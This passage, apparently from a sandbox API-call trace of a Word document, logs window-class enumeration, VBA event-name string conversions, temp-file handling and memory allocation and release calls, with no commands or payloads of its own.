returned 0x64c [0089.515] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0089.515] GetClassNameA (in: hWnd=0x300a8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.515] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.515] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0089.515] GetClassNameA (in: hWnd=0x20080, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DV2ControlHost") returned 14 [0089.515] lstrcmpA (lpString1="DV2ControlHost", lpString2="ThunderRT6Main") returned -1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x20080, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.515] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f6 [0089.515] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0089.515] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x228 [0089.515] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0089.515] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.516] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x228 [0089.516] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x100f0 [0089.516] GetClassNameA (in: hWnd=0x100f0, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="#43") returned 3 [0089.516] lstrcmpA (lpString1="#43", lpString2="ThunderRT6Main") returned -1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x294 [0089.516] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0089.516] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.516] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x294 [0089.516] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100e8 [0089.516] GetClassNameA (in: hWnd=0x100e8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.516] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7c4 [0089.516] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e2 [0089.516] GetClassNameA (in: hWnd=0x100e2, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.516] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.516] GetWindow (hWnd=0x100e2, uCmd=0x2) returned 0x100da [0089.516] GetClassNameA (in: hWnd=0x100da, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.516] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x764 [0089.516] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0089.516] GetClassNameA (in: hWnd=0x50076, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DV2ControlHost") returned 14 [0089.516] lstrcmpA (lpString1="DV2ControlHost", lpString2="ThunderRT6Main") returned -1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x50076, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.516] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0089.516] GetClassNameA (in: hWnd=0x1006c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.516] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x730 [0089.516] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0089.516] GetClassNameA (in: hWnd=0x1006a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.516] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.516] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0089.516] GetClassNameA (in: hWnd=0x10062, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.516] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.516] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0089.516] GetClassNameA (in: hWnd=0x10050, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.516] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.516] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.517] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x10100 [0089.517] GetClassNameA (in: hWnd=0x10100, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0089.517] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x404 [0089.517] GetWindow (hWnd=0x10100, uCmd=0x2) returned 0x10102 [0089.517] GetClassNameA (in: hWnd=0x10102, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.517] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x404 [0089.517] GetWindow (hWnd=0x10102, uCmd=0x2) returned 0x1004c [0089.517] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0089.517] lstrcmpA (lpString1="NotifyIconOverflowWindow", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.517] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0089.517] GetClassNameA (in: hWnd=0x10038, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0089.517] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.517] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0089.517] GetClassNameA (in: hWnd=0x10030, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DDEMLEvent") returned 10 [0089.517] lstrcmpA (lpString1="DDEMLEvent", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x10030, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.517] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0089.517] GetClassNameA (in: hWnd=0x2002c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DDEMLMom") returned 8 [0089.517] lstrcmpA (lpString1="DDEMLMom", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.517] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x20026 [0089.517] GetClassNameA (in: hWnd=0x20026, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0089.517] lstrcmpA (lpString1="COMTASKSWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x20026, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0089.517] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0089.517] GetClassNameA (in: hWnd=0x1002a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Dwm") returned 3 [0089.517] lstrcmpA (lpString1="Dwm", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x1002a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x610 [0089.517] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0089.517] GetClassNameA (in: hWnd=0x20028, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.517] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0089.517] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0089.517] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.517] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.517] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x148 [0089.517] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0089.517] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="CicLoaderWndClass") returned 17 [0089.518] lstrcmpA (lpString1="CicLoaderWndClass", lpString2="ThunderRT6Main") returned -1 [0089.518] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x148 [0089.518] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x401ea [0089.518] GetClassNameA (in: hWnd=0x401ea, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.518] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.518] GetWindowThreadProcessId (in: hWnd=0x401ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.518] GetWindow (hWnd=0x401ea, uCmd=0x2) returned 0x100ca [0089.518] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Progman") returned 7 [0089.518] lstrcmpA (lpString1="Progman", lpString2="ThunderRT6Main") returned -1 [0089.518] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.518] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0089.518] CRetailMalloc_Alloc () returned 0x55548d8 [0089.518] CRetailMalloc_Free () returned 0x8db0301 [0089.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sample_file", cchWideChar=-1, lpMultiByteStr=0x3fd5d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sample_file", lpUsedDefaultChar=0x0) returned 12 [0089.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="New", cchWideChar=4, lpMultiByteStr=0x11f890, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="New", lpUsedDefaultChar=0x0) returned 4 [0089.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x11f890, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5 [0089.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Close", cchWideChar=6, lpMultiByteStr=0x11f890, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Close", lpUsedDefaultChar=0x0) returned 6 [0089.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sync", cchWideChar=5, lpMultiByteStr=0x11f890, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sync", lpUsedDefaultChar=0x0) returned 5 [0089.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XMLAfterInsert", cchWideChar=15, lpMultiByteStr=0x11f890, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XMLAfterInsert", lpUsedDefaultChar=0x0) returned 15 [0089.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XMLBeforeDelete", cchWideChar=16, lpMultiByteStr=0x11f890, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XMLBeforeDelete", lpUsedDefaultChar=0x0) returned 16 [0089.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlAfterAdd", cchWideChar=23, lpMultiByteStr=0x11f890, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlAfterAdd", lpUsedDefaultChar=0x0) returned 23 [0089.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeDelete", cchWideChar=27, lpMultiByteStr=0x11f890, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeDelete", lpUsedDefaultChar=0x0) returned 27 [0089.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlOnExit", cchWideChar=21, lpMultiByteStr=0x11f890, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlOnExit", lpUsedDefaultChar=0x0) returned 21 [0089.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlOnEnter", cchWideChar=22, lpMultiByteStr=0x11f890, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlOnEnter", lpUsedDefaultChar=0x0) returned 22 [0089.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeStoreUpdate", cchWideChar=32, lpMultiByteStr=0x11f890, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeStoreUpdate", lpUsedDefaultChar=0x0) returned 32 [0089.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeContentUpdate", cchWideChar=34, lpMultiByteStr=0x11f890, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeContentUpdate", lpUsedDefaultChar=0x0) returned 34 [0089.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuildingBlockInsert", cchWideChar=20, lpMultiByteStr=0x11f890, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuildingBlockInsert", lpUsedDefaultChar=0x0) returned 20 [0089.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="~WRL0001", cchWideChar=-1, lpMultiByteStr=0x3fd5d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~WRL0001", lpUsedDefaultChar=0x0) returned 9 [0089.948] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.948] wcscpy_s (in: _Destination=0x11f2de, _SizeInWords=0x105, _Source="C:\\Users\\BGC6U8~1\\Desktop\\~WRL0001.tmp" | out: _Destination="C:\\Users\\BGC6U8~1\\Desktop\\~WRL0001.tmp") returned 0x0 [0089.948] _wcsicmp (_String1="*\\CC:\\Users\\BGC6U8~1\\Desktop\\~WRL0001.tmp", _String2="*\\CC:\\Users\\BGC6U8~1\\Desktop\\sample_file.doc") returned 11 [0089.948] wcscpy_s (in: _Destination=0x55d8944, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0089.949] CRetailMalloc_Alloc () returned 0x534d4b0 [0089.949] CRetailMalloc_Free () returned 0xa70001 [0089.950] CRetailMalloc_Alloc () returned 0x534d4b0 [0089.950] CRetailMalloc_Free () returned 0xa70001 [0089.950] CRetailMalloc_Alloc () returned 0x5365fc8 [0089.950] CRetailMalloc_Free () returned 0x3c40001 [0089.950] CRetailMalloc_Alloc () returned 0x5365fc8 [0089.950] CRetailMalloc_Free () returned 0x3c40001 [0089.950] CRetailMalloc_Alloc () returned 0x51de218 [0089.950] CRetailMalloc_Free () returned 0x2280001 [0089.950] CRetailMalloc_Alloc () returned 0x51de218 [0089.950] CRetailMalloc_Free () returned 0x2280001 [0089.951] CRetailMalloc_Alloc () returned 0x56ca5b0 [0089.951] CRetailMalloc_Free () returned 0xec0001 [0089.951] CRetailMalloc_Alloc () returned 0x56ca5b0 [0089.951] CRetailMalloc_Free () returned 0xec0001 [0089.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="~WRL0001", cchWideChar=-1, lpMultiByteStr=0x3fd5d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~WRL0001", lpUsedDefaultChar=0x0) returned 9 [0089.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sample_file", cchWideChar=-1, lpMultiByteStr=0x3fd5d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sample_file", lpUsedDefaultChar=0x0) returned 12 [0089.964] CRetailMalloc_Free () returned 0x2780001 [0089.964] CRetailMalloc_Free () returned 0x5000001 [0089.964] CRetailMalloc_Free () returned 0x4be0001 [0089.964] CRetailMalloc_Free () returned 0x4c40001 [0089.965] CRetailMalloc_Free () returned 0x4fa0001 [0089.965] CRetailMalloc_Free () returned 0x51e0001 [0089.965] CRetailMalloc_Free () returned 0x5060001 [0089.965] CRetailMalloc_Free () returned 0x1a0001 [0089.965] CRetailMalloc_Alloc () returned 0x786b578 [0089.965] CRetailMalloc_Free () returned 0xeb70201 [0089.965] CRetailMalloc_Free () returned 0xea20201 [0089.965] CRetailMalloc_Free () returned 0x3980001 [0089.965] CRetailMalloc_Alloc () returned 0x786b518 [0089.965] CRetailMalloc_Alloc () returned 0x5727eb0 [0089.965] CRetailMalloc_Alloc () returned 0x786b578 [0089.976] CRetailMalloc_Free () returned 0xeb70201 [0089.976] VirtualFree (lpAddress=0x4530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.980] VirtualFree (lpAddress=0x4540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.981] VirtualFree (lpAddress=0x4550000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.981] VirtualFree (lpAddress=0x46f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.982] VirtualFree (lpAddress=0x4740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.982] VirtualFree (lpAddress=0x4750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.983] VirtualFree (lpAddress=0x4760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.983] VirtualFree (lpAddress=0x4770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.983] CRetailMalloc_Free () returned 0x1880001 [0089.984] CRetailMalloc_Free () returned 0x1 [0089.984] CRetailMalloc_Alloc () returned 0x55aaf00 [0089.984] CRetailMalloc_Alloc () returned 0x5796140 [0089.984] CRetailMalloc_Alloc () returned 0x57960d0 [0089.984] CRetailMalloc_Alloc () returned 0x55d0ba0 [0089.984] CRetailMalloc_Alloc () returned 0x55d0978 [0089.984] CRetailMalloc_Alloc () returned 0x55d0528 [0089.984] CRetailMalloc_Alloc () returned 0x57228c8 [0089.984] CRetailMalloc_Alloc () returned 0x57968b0 [0089.984] CRetailMalloc_Alloc () returned 0x5615ef8 [0089.984] CRetailMalloc_Free () returned 0x1100001 [0089.984] CRetailMalloc_Free () returned 0x1 [0089.984] CRetailMalloc_Free () returned 0x1 [0089.984] CRetailMalloc_Free () returned 0xffff0001 [0089.984] CRetailMalloc_Free () returned 0x20001 [0089.984] CRetailMalloc_Free () returned 0x22a0001 [0089.984] CRetailMalloc_Free () returned 0x8c0001 [0089.984] CRetailMalloc_Free () returned 0x1 [0089.984] CRetailMalloc_Free () returned 0xd10001 [0089.984] CRetailMalloc_Free () returned 0x1 [0089.984] IUnknown:Release (This=0x2876548) returned 0x4 [0089.984] IUnknown:Release (This=0x2875630) returned 0x9 [0089.984] IUnknown:Release (This=0x2876770) returned 0x5 [0089.984] IUnknown:Release (This=0x2876bc0) returned 0x4 [0089.985] CRetailMalloc_Free () returned 0xed50201 [0089.985] CRetailMalloc_Free () returned 0x5b90001 [0089.985] CRetailMalloc_Free () returned 0x500001 [0089.985] CRetailMalloc_Free () returned 0x800001 [0089.985] CRetailMalloc_Alloc () returned 0x786b560 [0089.985] CRetailMalloc_Alloc () returned 0x5728158 [0089.985] CRetailMalloc_Alloc () returned 0x534d4b0 [0089.985] CRetailMalloc_Free () returned 0xa70001 [0089.985] CRetailMalloc_Alloc () returned 0x534d4b0 [0089.985] CRetailMalloc_Free () returned 0xa70001 [0089.986] CRetailMalloc_Alloc () returned 0x5365ea0 [0089.986] CRetailMalloc_Free () returned 0x3300001 [0089.986] CRetailMalloc_Alloc () returned 0x5365ea0 [0089.986] CRetailMalloc_Free () returned 0x3300001 [0089.986] CRetailMalloc_Alloc () returned 0x5485098 [0089.986] CRetailMalloc_Free () returned 0x3220001 [0089.986] CRetailMalloc_Alloc () returned 0x5485098 [0089.986] CRetailMalloc_Free () returned 0x3220001 [0089.986] CRetailMalloc_Alloc () returned 0x56ca5b0 [0089.986] CRetailMalloc_Free () returned 0xec0001 [0089.986] CRetailMalloc_Alloc () returned 0x56ca5b0 [0089.986] CRetailMalloc_Free () returned 0xec0001 [0089.987] IUnknown:Release (This=0x2876548) returned 0x3 [0089.987] IUnknown:Release (This=0x2875630) returned 0x8 [0089.987] IUnknown:Release (This=0x2876770) returned 0x4 [0089.987] IUnknown:Release (This=0x2876bc0) returned 0x3 [0089.987] CExposedDocFile::Release () returned 0x2 [0089.987] CExposedDocFile::Release () returned 0x1 [0089.987] CRetailMalloc_Free () returned 0x4e90101 [0089.987] CRetailMalloc_Free () returned 0x46c0101 [0089.987] CRetailMalloc_Free () returned 0x2720001 [0089.989] CExposedDocFile::Release () returned 0x0 [0089.989] CExposedDocFile::Release () returned 0x0 [0089.989] CRetailMalloc_Free () returned 0x290001 [0089.990] CExposedDocFile::Release () returned 0x3 [0089.991] CExposedDocFile::Release () returned 0x2 [0089.991] CExposedDocFile::Release () returned 0x1 [0089.991] CRetailMalloc_Free () returned 0x4710101 [0089.991] CRetailMalloc_Free () returned 0x1120001 [0089.991] CExposedDocFile::Release () returned 0x1 [0089.991] CExposedDocFile::Release () returned 0x0 [0089.991] CExposedDocFile::Release () returned 0x0 [0089.991] CRetailMalloc_Free () returned 0x5200101 [0089.991] CRetailMalloc_Free () returned 0x4d50101 [0089.992] CRetailMalloc_Free () returned 0x1360001 [0089.992] CRetailMalloc_Free () returned 0x1280001 [0089.992] CRetailMalloc_Free () returned 0x1 [0089.992] CRetailMalloc_Free () returned 0xac0001 [0089.992] CRetailMalloc_Free () returned 0x1 [0089.992] CRetailMalloc_Free () returned 0x5480101 [0089.992] CRetailMalloc_Free () returned 0x570001 [0089.992] CRetailMalloc_Free () returned 0xf20001 [0089.992] CRetailMalloc_Free () returned 0x7490001 [0089.992] CRetailMalloc_Free () returned 0x470001 [0089.992] CRetailMalloc_Free () returned 0x33e0001 [0089.992] CRetailMalloc_Free () returned 0x40d0001 [0089.992] CRetailMalloc_Free () returned 0x3830001 [0089.992] CRetailMalloc_Free () returned 0x1 [0089.992] CRetailMalloc_Alloc () returned 0x78b1f20 [0089.992] CRetailMalloc_Free () returned 0x3a80001 [0089.992] CRetailMalloc_Free () returned 0x4940101 [0089.992] CRetailMalloc_Free () returned 0x2780001 [0089.992] CRetailMalloc_Free () returned 0xf590001 [0089.992] CRetailMalloc_Free () returned 0x1 [0089.992] CRetailMalloc_Free () returned 0x11e0101 [0089.992] CRetailMalloc_Free () returned 0x48f0101 [0089.992] CRetailMalloc_Free () returned 0xeb40201 [0089.992] CRetailMalloc_Free () returned 0xce0001 [0089.992] CRetailMalloc_Free () returned 0x3720001 [0089.992] CRetailMalloc_Free () returned 0x3a40001 [0089.992] CRetailMalloc_Free () returned 0x1 [0089.992] CRetailMalloc_Free () returned 0x2860101 [0089.992] CRetailMalloc_Free () returned 0xc020101 [0089.992] CRetailMalloc_Free () returned 0x16a0001 [0089.992] CRetailMalloc_Free () returned 0x20001 [0089.992] CRetailMalloc_Free () returned 0xf6f0001 [0089.992] CRetailMalloc_Free () returned 0x3760001 [0089.993] IUnknown:Release (This=0x2876548) returned 0x2 [0089.993] IUnknown:Release (This=0x2875630) returned 0x4 [0089.993] IUnknown:Release (This=0x2876770) returned 0x3 [0089.993] IUnknown:Release (This=0x2876bc0) returned 0x2 [0089.993] CRetailMalloc_Free () returned 0xeab0201 [0089.993] CRetailMalloc_Free () returned 0xe20101 [0089.993] CRetailMalloc_Free () returned 0xea50201 [0089.993] CRetailMalloc_Alloc () returned 0x78b1d60 [0089.993] CRetailMalloc_Free () returned 0x3700001 [0089.993] CRetailMalloc_Free () returned 0x4990101 [0089.993] CRetailMalloc_Free () returned 0x20c0001 [0089.993] CRetailMalloc_Free () returned 0xf850001 [0089.993] CRetailMalloc_Free () returned 0x1 [0089.993] CRetailMalloc_Free () returned 0x5070101 [0089.993] CRetailMalloc_Free () returned 0xe990201 [0089.993] CRetailMalloc_Free () returned 0x9b0001 [0089.993] CRetailMalloc_Free () returned 0x3640001 [0089.993] CRetailMalloc_Free () returned 0x36c0001 [0089.993] CRetailMalloc_Free () returned 0x1 [0089.993] CRetailMalloc_Free () returned 0x1880001 [0089.993] CRetailMalloc_Free () returned 0x1d00001 [0089.993] CRetailMalloc_Free () returned 0xf9b0001 [0089.993] CRetailMalloc_Free () returned 0x1 [0089.993] CRetailMalloc_Free () returned 0x1 [0089.993] CRetailMalloc_Free () returned 0x1 [0089.993] CRetailMalloc_Free () returned 0x5110101 [0089.994] CRetailMalloc_Free () returned 0x1 [0089.994] CRetailMalloc_Alloc () returned 0x78b1cc0 [0089.994] CRetailMalloc_Free () returned 0x36c0001 [0089.994] CRetailMalloc_Free () returned 0x4530101 [0089.994] CRetailMalloc_Free () returned 0xf4e0001 [0089.994] CRetailMalloc_Free () returned 0x1 [0089.994] CRetailMalloc_Free () returned 0x4f80101 [0089.994] CRetailMalloc_Free () returned 0xe960201 [0089.994] CRetailMalloc_Free () returned 0x350001 [0089.994] CRetailMalloc_Free () returned 0x3660001 [0089.994] CRetailMalloc_Free () returned 0x3580001 [0089.994] CRetailMalloc_Free () returned 0x1 [0089.994] CRetailMalloc_Free () returned 0xe9f0201 [0089.994] CRetailMalloc_Free () returned 0x1a60001 [0089.994] CRetailMalloc_Free () returned 0x1ec0001 [0089.994] CRetailMalloc_Free () returned 0xf900001 [0089.994] CRetailMalloc_Free () returned 0x1740001 [0089.994] IUnknown:Release (This=0x2876548) returned 0x1 [0089.994] IUnknown:Release (This=0x2875630) returned 0x2 [0089.994] IUnknown:Release (This=0x2876770) returned 0x2 [0089.994] IUnknown:Release (This=0x2876bc0) returned 0x1 [0089.994] CRetailMalloc_Free () returned 0xedb0201 [0089.994] CRetailMalloc_Free () returned 0x5020101 [0089.994] CRetailMalloc_Free () returned 0x20001 [0089.994] CRetailMalloc_Alloc () returned 0x5280798 [0089.994] CRetailMalloc_Free () returned 0x3620001 [0089.994] CRetailMalloc_Free () returned 0x45d0101 [0089.994] CRetailMalloc_Free () returned 0x2fc0001 [0089.994] CRetailMalloc_Free () returned 0x1 [0089.994] CRetailMalloc_Free () returned 0x4580101 [0089.994] CRetailMalloc_Free () returned 0xef60201 [0089.994] CRetailMalloc_Free 